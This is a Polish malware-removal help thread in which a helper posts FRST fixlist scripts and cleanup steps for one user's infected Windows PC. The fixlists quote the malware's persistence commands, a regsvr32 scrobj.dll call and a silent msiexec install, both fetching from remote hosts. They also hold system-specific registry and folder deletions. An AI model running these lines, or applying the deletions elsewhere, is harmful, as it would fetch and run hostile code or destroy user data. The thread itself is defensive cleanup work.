ShortcutTarget: maxton-1.lnk -> C:\Users\DG_Ochota\AppData\Roaming\maxton-12\maxton-4.exe () S3 dbx; system32\DRIVERS\dbx.sys [X] RemoveDirectory: C:\ProgramData\molarity-3 RemoveDirectory: C:\Users\DG_Ochota\AppData\Roaming\vctcxo-26 RemoveDirectory: C:\ProgramData\anion-4 RemoveDirectory: C:\Users\DG_Ochota\AppData\Roaming\maxton-12 EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Kliknij klawisz z flagą Windows + R > wklej komendę "C:\Program Files (x86)\Mozilla Firefox\firefox.exe" -p lub "C:\Program Files\Mozilla Firefox\firefox.exe" -p > załóż nowy profil, wszystkie poprzednie skasuj. 3. Upewnij się, że Malwarebytes już niczego nie wykrywa, jeśli coś wykryję to daj do kasacji. Skan powtarzaj do wyniku zero infekcji. 4. Przeskanuj system całościowo narzędziem HitmanPro. Jeśli coś wykryje, to niczego nie usuwaj, a dostarcz raport. 5. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

Temat niezgodny z regulaminem*, - brak raportu z AdwCleaner, więc akcję z nim muszę powtórzyć. * - teraz daruję. Twój opis pokłada się w całości z tym co ja widzę w systemie, więc powtarzanie sobie odpuszczę. Co do uszkodzenia połączenia to tyle razy tu powtarzam - "nie jesteś wykwalifikowany, szkolony to nie interpretuj wyników skanu samemu". Podejrzewam uszkodzenie łańcucha sieciowego i wdrążam jego reset. Jeśli zaś chodzi o oprogramowanie, które używałeś do dezynfekcji to firma IObit ma wiele kontrowersji, m.in kradzież bazy danych MBAM. Pod ocenę indywidualną zostawiam proces deinstalacji. 1. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: Task: {E4F6EEF5-C592-488F-97B6-5D0BD01A5B68} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkMj8xRkMdRYFdRkUcN8Y1N8U2F8F5NTLQMUI4NkVSRWk2Nq== scrobj.dll C:\Users\fundowic\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\fundowic\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\Users\fundowic\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk C:\Users\Public\Desktop\Mozilla Firefox.lnk C:\Users\Public\Desktop\Google Chrome.lnk FirewallRules: [{A334B4CB-70C2-40AE-AC60-82462738B5FA}] => (Allow) C:\Program Files (x86)\Bagsarah\Application\chrome.exe FirewallRules: [{8BFEA076-5BFA-4EB6-8DF9-B3B7E74FC8FC}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe FirewallRules: [{3A44F400-C937-46F0-8F78-609CA667F38A}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe RemoveDirectory: C:\Program Files (x86)\Bagsarah RemoveDirectory: C:\Users\fundowic\AppData\Local\Bagsarah RemoveDirectory: C:\Program Files (x86)\Firefox HKU\S-1-5-21-202387345-4201324245-3709672714-20981\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj8xRkMdRYFdRkUcN8Y1N8U2F8F5NTLQMUI4NkVSRWk2Nq== /q GroupPolicy: Restriction <======= ATTENTION R2 OneDirveSrv; C:\ProgramData\Microsoft OneDrive\setup\SyncTool.dll [129024 2017-05-10] () [File not signed] C:\ProgramData\Microsoft OneDrive\setup\SyncTool.dll U3 mfeavfk01; no ImagePath S3 VGPU; System32\drivers\rdvgkmd.sys [X] C:\ProgramData\Microsoft\Windows\Start Menu\WinZip.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinZip\ReadMe.txt.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinZip\Uninstall WinZip.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinZip\What's New.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinZip\WinZip 8.1 .lnk C:\Users\fundowic\AppData\Roaming\Microsoft\Word\kks%20stan%20faktyczny305905222082449539\kks%20stan%20faktyczny.docx.lnk DeleteKey: HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains DeleteKey: HKCU\Software\Google DeleteKey: HKLM\SOFTWARE\Google DeleteKey: HKLM\SOFTWARE\Wow6432Node\Google C:\Program Files (x86)\Google C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome C:\Users\fundowic\AppData\Local\Google DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\fundowic\AppData\Local\Mozilla C:\Users\fundowic\AppData\Roaming\Mozilla C:\Users\fundowic\AppData\Roaming\Profiles CMD: netsh winsock reset EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry). bagsarah;firefox Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 3. Powtórz akcję z AdwCleaner, ale jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 4. Zrób nowy log FRST z opcji Skanuj (Scan), wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.